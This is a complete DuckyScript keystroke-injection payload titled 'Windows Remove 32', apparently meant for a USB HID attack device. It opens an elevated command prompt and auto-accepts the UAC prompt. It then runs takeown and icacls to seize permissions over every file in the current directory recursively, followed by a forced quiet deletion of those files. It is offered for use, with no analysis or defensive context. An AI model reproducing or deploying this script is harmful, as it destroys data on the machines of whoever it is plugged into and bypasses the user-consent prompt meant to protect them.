REM ###########################################################
REM #                                                         |
REM # Title        : Windows Remove 32                        |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################
DELAY 500
GUI r
DELAY 500
STRING cmd
CTRL-SHIFT ENTER
DELAY 2000
ALT y
DELAY 1500
STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
ENTER